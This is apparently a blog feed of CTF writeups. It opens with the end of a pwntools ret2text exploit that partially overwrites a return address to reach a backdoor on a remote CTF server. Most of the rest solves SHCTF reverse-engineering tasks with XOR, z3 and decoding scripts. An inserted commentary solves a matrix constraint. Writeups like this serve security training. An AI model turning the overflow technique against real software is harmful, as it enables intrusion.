class="hljs-built_in">print</span>(a)<br>r = <span class="hljs-built_in">eval</span>(a)<br>p.sendline(<span class="hljs-built_in">str</span>(r))<br>p.interactive()<br></code></pre></td></tr></table></figure>
<h2 id="ret2text"><a href="#ret2text" class="headerlink" title="ret2text"></a>ret2text</h2><p>PIE is on, so only the low bytes of the return address are overwritten and the randomized bits are brute-forced by hand (rerun until the backdoor lands); note that the padding length is not 0x50.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br><span class="hljs-comment"># context.terminal = [&#x27;gnome-terminal&#x27;, &#x27;-x&#x27;, &#x27;sh&#x27;, &#x27;-c&#x27;]</span><br><span class="hljs-comment"># r = gdb.debug(&#x27;./ret2text&#x27;)</span><br><span class="hljs-comment"># r = process(&#x27;./ret2text&#x27;)</span><br><br>r = remote(<span class="hljs-string">&#x27;pwn.node.game.sycsec.com&#x27;</span>,<span class="hljs-number">31949</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">debug</span>():<br> gdb.attach(r)<br> pause()<br>elf = ELF(<span 
class="hljs-string">&#x27;ret2text&#x27;</span>)<br>se = <span class="hljs-keyword">lambda</span> data :r.send(data)<br>sa = <span class="hljs-keyword">lambda</span> delim,data :r.sendafter(delim, data)<br>sl = <span class="hljs-keyword">lambda</span> data :r.sendline(data)<br>sla = <span class="hljs-keyword">lambda</span> delim,data :r.sendlineafter(delim, data)<br>sea = <span class="hljs-keyword">lambda</span> delim,data :r.sendafter(delim, data)<br>rc = <span class="hljs-keyword">lambda</span> numb=<span class="hljs-number">4096</span> :r.recv(numb)<br>rl = <span class="hljs-keyword">lambda</span> :r.recvline()<br>ru = <span class="hljs-keyword">lambda</span> delims :r.recvuntil(delims)<br>uu32 = <span class="hljs-keyword">lambda</span> data :u32(data.ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b&#x27;\0&#x27;</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> data :u64(data.ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\0&#x27;</span>))<br>lic = <span class="hljs-keyword">lambda</span> data :uu64(ru(data)[-<span class="hljs-number">6</span>:])<br>padding = <span class="hljs-keyword">lambda</span> lenth :<span class="hljs-string">b&#x27;Yhuan&#x27;</span>*(lenth//<span class="hljs-number">5</span>)+<span class="hljs-string">b&#x27;Y&#x27;</span>*(lenth % <span class="hljs-number">5</span>)<br>it = <span class="hljs-keyword">lambda</span> :r.interactive()<br><br>pad = p64(<span class="hljs-number">0</span>)*<span class="hljs-number">9</span> + p64(<span class="hljs-number">1</span>)<br>backdoor = <span class="hljs-string">b&#x27;\x27\xA2&#x27;</span><br><br>pl1 = pad + p64(<span class="hljs-number">0</span>) + backdoor<br>se(pl1)<br><br>r.interactive()<br></code></pre></td></tr></table></figure></summary>
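Added example for the easymath section of this entry, not the writeup's own code: the z3 script states that the 5x5 matrix F built from the first 25 flag bytes satisfies F times M equals the identity mod 32, so F is simply the inverse of M mod 32. The determinant of the page's matrix is odd, hence a unit mod 32, and the inverse is det^-1 times the adjugate; no solver is needed. The residues only fix the low five bits of each character, so the alphabet is used to list candidates. Assumptions: the F-times-M order is read off the z3 loop (flag index 5*i+k, matrix index 5*k+j), and the 2x2 matrix in the test is constructed.

```python
# Added example (not from the writeup): solve the easymath constraint directly.
# The z3 script encodes F * M == I (mod 32) with F the 5x5 matrix of flag bytes,
# so F is the inverse of M mod 32, computable via the adjugate since det(M) is odd.

MOD = 32     # the binary keeps only the low five bits of each entry (x mod 32)

MATRIX = [0x12, 0x1D, 0x10, 0x13, 0x1B, 0x08, 0x1F, 0x08, 0x17, 0x1E,
          0x1D, 0x03, 0x1C, 0x0A, 0x15, 0x12, 0x1D, 0x08, 0x10, 0x1C,
          0x0B, 0x1E, 0x07, 0x14, 0x07]        # constant matrix from the writeup
CHARSET = "01234_asdzxcpoityumnbAOZWXGMY"       # flag alphabet from the writeup


def to_rows(flat, n):
    """Reshape a flat row-major list into an n x n list of rows."""
    return [flat[i * n:(i + 1) * n] for i in range(n)]


def det(m):
    """Exact integer determinant by cofactor expansion along the first row."""
    n = len(m)
    if n == 1:
        return m[0][0]
    total = 0
    for j in range(n):
        minor = [row[:j] + row[j + 1:] for row in m[1:]]
        sign = 1 if j % 2 == 0 else -1
        total += sign * m[0][j] * det(minor)
    return total


def inverse_mod(m, mod=MOD):
    """Inverse of a square integer matrix mod `mod` (adjugate / det), or None."""
    n = len(m)
    try:
        d_inv = pow(det(m) % mod, -1, mod)   # ValueError if det is not a unit mod `mod`
    except ValueError:
        return None
    adj = [[0] * n for _ in range(n)]
    for i in range(n):
        for j in range(n):
            minor = [row[:j] + row[j + 1:] for k, row in enumerate(m) if k != i]
            sign = 1 if (i + j) % 2 == 0 else -1
            adj[j][i] = sign * det(minor)    # adjugate = transposed cofactor matrix
    return [[(d_inv * adj[i][j]) % mod for j in range(n)] for i in range(n)]


def matmul_mod(a, b, mod=MOD):
    """Product of two square matrices with every entry reduced mod `mod`."""
    n = len(a)
    return [[sum(a[i][k] * b[k][j] for k in range(n)) % mod for j in range(n)]
            for i in range(n)]


def is_identity(m):
    n = len(m)
    return all(m[i][j] == (1 if i == j else 0) for i in range(n) for j in range(n))


def candidates(residues, charset=CHARSET, mod=MOD):
    """For each residue, the alphabet characters whose low five bits match it."""
    return [[c for c in charset if ord(c) % mod == r] for r in residues]


def solve_easymath():
    """Residues of the 25 matrix-constrained flag bytes and their alphabet candidates."""
    inv = inverse_mod(to_rows(MATRIX, 5))
    if inv is None:
        return None
    residues = [x for row in inv for x in row]   # flag[5*i + k] == inv[i][k]
    return residues, candidates(residues)


if __name__ == "__main__":
    residues, cands = solve_easymath()
    print(residues)
    print(["".join(c) for c in cands])
```

Because only the low five bits are determined, the writeup's extra constraints on flag[1], flag[7] and flag[17] are exactly the tie-breakers this needs: residue 20 matches both '4' and 't', and residue 25 matches both 'y' and 'Y'. The 26th byte is never touched by the matrix and is limited to the alphabet alone.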
</entry>
<entry>
<title>SHCTF</title>
<link href="https://shenshuoyaoyouguangha.github.io/2023/10/02/SHCTF/"/>
<id>https://shenshuoyaoyouguangha.github.io/2023/10/02/SHCTF/</id>
<published>2023-10-02T10:19:44.000Z</published>
<updated>2023-12-18T05:33:29.883Z</updated>
<content type="html"><![CDATA[<h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><h3 id="WEEK1-ez-asm"><a href="#WEEK1-ez-asm" class="headerlink" title="[WEEK1]ez_asm"></a>[WEEK1]ez_asm</h3><p>Plain assembly: read the logic straight off the instructions and invert it. Each byte was XORed with 0x1E and then had 0xA subtracted, so the script adds 0xA back first and then applies the XOR again.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python">flag = <span class="hljs-string">"nhuo[M`7mc7uhc$7midgbTf`7`$7%#ubf7 ci5Y"</span> <span class="hljs-comment"># encrypted string</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(flag)):<br> <br> c = flag[i] <br> c = <span class="hljs-built_in">ord</span>(c)+<span class="hljs-number">0xA</span> <span class="hljs-comment"># undo the subtraction of 0xA</span><br> flag = flag[:i] + <span class="hljs-built_in">chr</span>(c) + flag[i+<span class="hljs-number">1</span>:]<br><br> c = flag[i]<br> c = <span class="hljs-built_in">ord</span>(c)^<span class="hljs-number">0x1E</span> <span class="hljs-comment"># XOR is its own inverse</span><br> flag = flag[:i] + <span class="hljs-built_in">chr</span>(c) + flag[i+<span class="hljs-number">1</span>:]<br><br><br><br><span class="hljs-built_in">print</span>(flag)<br></code></pre></td></tr></table></figure><span id="more"></span> <h3 id="WEEK1-easy-re"><a href="#WEEK1-easy-re" class="headerlink" title="[WEEK1]easy_re"></a>[WEEK1]easy_re</h3><p>The encryption only swaps the two nibbles of every byte: the high nibble moves to the low position and the low nibble to the high position. The swap is its own inverse, so the same operation recovers the plaintext:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python">des =[<br> <span class="hljs-number">0x66</span>, <span class="hljs-number">0xC6</span>, <span class="hljs-number">0x16</span>, <span class="hljs-number">0x76</span>, <span class="hljs-number">0xB7</span>, <span class="hljs-number">0x45</span>, <span class="hljs-number">0x27</span>, <span class="hljs-number">0x97</span>, <span class="hljs-number">0xF5</span>, <span class="hljs-number">0x47</span>, <br> <span class="hljs-number">0x03</span>, <span class="hljs-number">0xF5</span>, <span class="hljs-number">0x37</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0xC6</span>, <span class="hljs-number">0x67</span>, <span class="hljs-number">0x33</span>, <span class="hljs-number">0xF5</span>, <span class="hljs-number">0x47</span>, <span class="hljs-number">0x86</span>, <br> <span class="hljs-number">0x56</span>, <span class="hljs-number">0xF5</span>, <span class="hljs-number">0x26</span>, <span class="hljs-number">0x96</span>, <span class="hljs-number">0xE6</span>, <span class="hljs-number">0x16</span>, <span class="hljs-number">0x27</span>, <span class="hljs-number">0x97</span>, <span class="hljs-number">0xF5</span>, <span class="hljs-number">0x07</span>, <br> <span class="hljs-number">0x27</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x26</span>, <span class="hljs-number">0xC6</span>, <span class="hljs-number">0x33</span>, <span class="hljs-number">0xD6</span>, <span class="hljs-number">0xD7</span><br>]<br><br>result = <span 
class="hljs-string">""</span><br><br><span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> des:<br> high = (c & <span class="hljs-number">0xF0</span>) >> <span class="hljs-number">4</span> <span class="hljs-comment"># c is already an int; high nibble goes to the low position</span><br> low = (c & <span class="hljs-number">0x0F</span>) << <span class="hljs-number">4</span> <span class="hljs-comment"># low nibble goes to the high position</span><br> orig = high | low<br> <br> result += <span class="hljs-built_in">chr</span>(orig)<br><br><span class="hljs-built_in">print</span>(result)<br></code></pre></td></tr></table></figure><h3 id="WEEK1-seed"><a href="#WEEK1-seed" class="headerlink" title="[WEEK1]seed"></a>[WEEK1]seed</h3><p>IDA shows the program draws 10 values from the C pseudo-random generator and XORs them into the flag, so the only unknown is the seed. Stepping through it under the debugger shows that srand() is called with 0, which makes rand() fully deterministic. The sequence rand() produces depends on the C library, so the key must be regenerated against the same libc the binary uses; here it is simply rebuilt in C:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span 
class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><time.h></span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> {<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> flag[<span class="hljs-number">50</span>];<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> key[<span class="hljs-number">10</span>];<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> des[<span class="hljs-number">45</span>] = {<br> <span class="hljs-number">0x40</span>, <span class="hljs-number">0x29</span>, <span class="hljs-number">0x28</span>, <span class="hljs-number">0xE9</span>, <span class="hljs-number">0xC2</span>, <span class="hljs-number">0x04</span>, <span class="hljs-number">0xA4</span>, <span class="hljs-number">0xED</span>, <span class="hljs-number">0x9F</span>, <span class="hljs-number">0x53</span>, <span class="hljs-number">0x5F</span>, <span class="hljs-number">0x75</span>, <span class="hljs-number">0x3C</span>, <span class="hljs-number">0xD1</span>, <span class="hljs-number">0xCD</span>, <span class="hljs-number">0x2B</span>, <span class="hljs-number">0xA8</span>,<br> <span class="hljs-number">0xC4</span>, <span class="hljs-number">0x89</span>, <span class="hljs-number">0x69</span>, <span class="hljs-number">0x15</span>, <span class="hljs-number">0x21</span>, <span class="hljs-number">0x16</span>, <span class="hljs-number">0xEF</span>, <span class="hljs-number">0xD7</span>, <span class="hljs-number">0x27</span>, <span class="hljs-number">0x92</span>, <span class="hljs-number">0xDF</span>, <span class="hljs-number">0xCA</span>, <span 
class="hljs-number">0x53</span>, <span class="hljs-number">0x5F</span>, <span class="hljs-number">0x2A</span>, <span class="hljs-number">0x3C</span>, <span class="hljs-number">0xD1</span>,<br> <span class="hljs-number">0xCE</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0xA3</span>, <span class="hljs-number">0xEF</span>, <span class="hljs-number">0xA5</span>, <span class="hljs-number">0x78</span>, <span class="hljs-number">0x16</span>, <span class="hljs-number">0x1A</span>, <span class="hljs-number">0x2D</span>, <span class="hljs-number">0xE1</span>, <span class="hljs-number">0xC4</span><br> }; <span class="hljs-comment">// ciphertext</span><br><br> srand(<span class="hljs-number">0</span>); <span class="hljs-comment">// seed is 0, as observed while debugging the binary</span><br><br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i < <span class="hljs-number">10</span>; i++) {<br> key[i] = rand() % <span class="hljs-number">255</span>; <span class="hljs-comment">// regenerate the 10-byte key from the same PRNG</span><br> }<br><br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i < <span class="hljs-number">45</span>; i++) {<br> des[i] ^= key[i % <span class="hljs-number">10</span>]; <span class="hljs-comment">// XOR is its own inverse: this undoes the encryption</span><br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%c"</span>, des[i]);<br> }<br><br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><br></code></pre></td></tr></table></figure><h3 id="WEEK1-signin"><a href="#WEEK1-signin" class="headerlink" title="[WEEK1]signin"></a>[WEEK1]signin</h3><p>Open it in IDA and the flag is right there:</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.zvde9hyzyog.png"></p><h3 id="WEEK1-easy-math"><a href="#WEEK1-easy-math" class="headerlink" title="[WEEK1]easy_math"></a>[WEEK1]easy_math</h3><p>Six linear equations in six unknowns: hand them to z3 as constraints, then split each solved value into its bytes to read the flag.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> z3 <span class="hljs-keyword">import</span> *<br><br><span class="hljs-comment"># 创建一个符号变量数组l,包含6个整数变量</span><br>l = [Int(<span class="hljs-string">'l%d'</span> % i) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">6</span>)]<br><br><span class="hljs-comment"># 创建一个Z3求解器</span><br>solver = Solver()<br><br><span class="hljs-comment"># 添加方程组</span><br>solver.add(<br> (<span class="hljs-number">593</span> * l[<span class="hljs-number">0</span>] + <span class="hljs-number">997</span> * l[<span class="hljs-number">1</span>] + <span class="hljs-number">811</span> * l[<span class="hljs-number">2</span>] + <span class="hljs-number">258</span> * l[<span class="hljs-number">3</span>] + <span class="hljs-number">829</span> * l[<span class="hljs-number">4</span>] + <span class="hljs-number">532</span> * l[<span 
class="hljs-number">5</span>]) == <span class="hljs-number">0x5b8e0aef71d34ff43</span>,<br> (<span class="hljs-number">605</span> * l[<span class="hljs-number">0</span>] + <span class="hljs-number">686</span> * l[<span class="hljs-number">1</span>] + <span class="hljs-number">328</span> * l[<span class="hljs-number">2</span>] + <span class="hljs-number">602</span> * l[<span class="hljs-number">3</span>] + <span class="hljs-number">695</span> * l[<span class="hljs-number">4</span>] + <span class="hljs-number">576</span> * l[<span class="hljs-number">5</span>]) == <span class="hljs-number">0x551a262360964ef7f</span>,<br> (<span class="hljs-number">373</span> * l[<span class="hljs-number">0</span>] + <span class="hljs-number">512</span> * l[<span class="hljs-number">1</span>] + <span class="hljs-number">449</span> * l[<span class="hljs-number">2</span>] + <span class="hljs-number">756</span> * l[<span class="hljs-number">3</span>] + <span class="hljs-number">448</span> * l[<span class="hljs-number">4</span>] + <span class="hljs-number">580</span> * l[<span class="hljs-number">5</span>]) == <span class="hljs-number">0x49d158a5657d6931c</span>,<br> (<span class="hljs-number">560</span> * l[<span class="hljs-number">0</span>] + <span class="hljs-number">635</span> * l[<span class="hljs-number">1</span>] + <span class="hljs-number">422</span> * l[<span class="hljs-number">2</span>] + <span class="hljs-number">971</span> * l[<span class="hljs-number">3</span>] + <span class="hljs-number">855</span> * l[<span class="hljs-number">4</span>] + <span class="hljs-number">597</span> * l[<span class="hljs-number">5</span>]) == <span class="hljs-number">0x625568d5abbabf4f3</span>,<br> (<span class="hljs-number">717</span> * l[<span class="hljs-number">0</span>] + <span class="hljs-number">507</span> * l[<span class="hljs-number">1</span>] + <span class="hljs-number">388</span> * l[<span class="hljs-number">2</span>] + <span class="hljs-number">925</span> * l[<span 
class="hljs-number">3</span>] + <span class="hljs-number">324</span> * l[<span class="hljs-number">4</span>] + <span class="hljs-number">524</span> * l[<span class="hljs-number">5</span>]) == <span class="hljs-number">0x50ee0c025e70e3c23</span>,<br> (<span class="hljs-number">312</span> * l[<span class="hljs-number">0</span>] + <span class="hljs-number">368</span> * l[<span class="hljs-number">1</span>] + <span class="hljs-number">884</span> * l[<span class="hljs-number">2</span>] + <span class="hljs-number">518</span> * l[<span class="hljs-number">3</span>] + <span class="hljs-number">495</span> * l[<span class="hljs-number">4</span>] + <span class="hljs-number">414</span> * l[<span class="hljs-number">5</span>]) == <span class="hljs-number">0x40e735f8aa2815f65</span><br>)<br><br><span class="hljs-comment"># 检查是否存在解</span><br><span class="hljs-keyword">if</span> solver.check() == sat:<br> model = solver.model()<br> result = [model[l[i]].as_long() <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">6</span>)]<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"Solution found:"</span>)<br> <span class="hljs-built_in">print</span>(result)<br><span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"No solution found."</span>)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">6</span>):<br> result[i]=<span class="hljs-built_in">hex</span>(result[i])<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(<span class="hljs-built_in">int</span>(result[i][<span class="hljs-number">2</span>:][j*<span 
class="hljs-number">2</span>:j*<span class="hljs-number">2</span>+<span class="hljs-number">2</span>],<span class="hljs-number">16</span>)),end=<span class="hljs-string">''</span>)<br></code></pre></td></tr></table></figure><h3 id="WEEK1-ez-apk"><a href="#WEEK1-ez-apk" class="headerlink" title="[WEEK1]ez_apk"></a>[WEEK1]ez_apk</h3><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.1p56go1mdb0g.png"></p><p>Reading the code we find the encryption function: it is a Base58 conversion over a custom alphabet, and the permuted alphabet itself is handed over directly at the end.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.1t2a0v5wtabk.webp"></p><p>Open the smali of MainActivity to find the original data, then decode it as Base58 with that alphabet.</p><p>The next script is unrelated to the APK: it decodes a USB keyboard capture (usbdata.txt), keeping only the reports in which every byte except the key-code byte is zero and mapping each HID usage code to a character.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs python">mappings = {<br>    0x04: "A", 0x05: "B", 0x06: "C", 0x07: "D", 0x08: "E", 0x09: "F", 0x0A: "G",<br>    0x0B: "H", 0x0C: "I", 0x0D: "J", 0x0E: "K", 0x0F: "L", 0x10: "M", 0x11: "N",<br>    0x12: "O", 0x13: "P", 0x14: "Q", 0x15: "R", 0x16: "S", 0x17: "T", 0x18: "U",<br>    0x19: "V", 0x1A: "W", 0x1B: "X", 0x1C: "Y", 0x1D: "Z", 0x1E: "1", 0x1F: "2",<br>    0x20: "3", 0x21: "4", 0x22: "5", 0x23: "6", 0x24: "7", 0x25: "8", 0x26: "9",<br>    0x27: "0", 0x28: "\n", 0x2A: "[DEL]", 0x2B: " ", 0x2C: " ", 0x2D: "-",<br>    0x2E: "=", 0x2F: "[", 0x30: "]", 0x31: "\\", 0x32: "~", 0x33: ";", 0x34: "'",<br>    0x36: ",", 0x37: ".",<br>}<br><br># keep only reports of the form 00:00:XX:00:00:00:00:00 and take XX (the key code)<br>nums = []<br>with open('usbdata.txt') as keys:<br>    for line in keys:<br>        if line[0] != '0' or line[1] != '0' or line[3] != '0' or line[4] != '0' \<br>           or line[9] != '0' or line[10] != '0' or line[12] != '0' or line[13] != '0' \<br>           or line[15] != '0' or line[16] != '0' or line[18] != '0' or line[19] != '0' \<br>           or line[21] != '0' or line[22] != '0':<br>            continue<br>        nums.append(int(line[6:8], 16))<br><br>output = ""<br>for n in nums:<br>    if n == 0:<br>        continue  # report with no key pressed<br>    if n in mappings:<br>        output += mappings[n]<br>    else:<br>        output += '[unknown]'<br>print('output :\n' + output)<br># output :<br># SEC2ETK3Y<br></code></pre></td></tr></table></figure><h3 id="WEEK2-pycode"><a href="#WEEK2-pycode" class="headerlink" title="[WEEK2]pycode"></a>[WEEK2]pycode</h3><p>Feed the Python bytecode to GPT to get it back into ordinary source form:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><br>flag = <span class="hljs-string">'*******************'</span><br>value = <span class="hljs-string">''</span><br>output = <span class="hljs-string">''</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1000</span>):<br> w = <span class="hljs-number">1024</span><br> x = w % <span 
class="hljs-number">3</span><br> y = w // <span class="hljs-number">9</span><br> z = x * y<br> w -= z<br> <br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">10000</span>):<br> w = <span class="hljs-number">20</span><br> x = w % <span class="hljs-number">6</span><br> y = w // <span class="hljs-number">3</span><br> z = x * y<br> w += z<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1000</span>):<br> w = <span class="hljs-number">1024</span><br> x = w % <span class="hljs-number">3</span><br> y = w // <span class="hljs-number">9</span> <br> z = x * y<br> w -= z<br> <br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">10000</span>):<br> w = <span class="hljs-number">20</span><br> x = w % <span class="hljs-number">6</span><br> y = w // <span class="hljs-number">3</span><br> z = x * y <br> w += z<br> <br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(flag)):<br> temp = flag[i]<br> temp = <span class="hljs-built_in">chr</span>(<span class="hljs-built_in">ord</span>(temp) ^ <span class="hljs-number">8</span>)<br> value += temp<br> <br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(flag)):<br> temp = value[i]<br> temp = <span class="hljs-built_in">chr</span>(<span class="hljs-built_in">ord</span>(temp) + <span class="hljs-number">3</span>)<br> output += temp<br> <br>obfuscated_output = base64.b64encode(output.encode()).decode()<br>obfuscated_output = obfuscated_output[::-<span class="hljs-number">1</span>] <span class="hljs-comment"># reversed, not truncated: the ciphertext starts with '=='</span><br>obfuscated_output = obfuscated_output.replace(<span 
class="hljs-string">'0'</span>, <span class="hljs-string">'t'</span>)<br>obfuscated_output = obfuscated_output.replace(<span class="hljs-string">'c'</span>, <span class="hljs-string">'4'</span>)<br>obfuscated_output = obfuscated_output.replace(<span class="hljs-string">'+'</span>, <span class="hljs-string">'-'</span>)<br><span class="hljs-built_in">print</span>(obfuscated_output)<br></code></pre></td></tr></table></figure><p>Everything above the last few lines is dead code: the w/x/y/z loops never touch the flag. What actually happens is XOR with 8, add 3, base64, reverse, then three character substitutions, so undo them back to front. Note that the substitutions are not bijective (a genuine 't' or '4' in the base64 text would also be mapped back), which is worth keeping in mind if the decoded result looks wrong.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br>a=<span class="hljs-string">'==AeAF3M-tzO-giQ-AUQosDQ9tGK7MDPuhC47tDNB5Tb8Yn4sdW4'</span><br><br>a=a.replace(<span 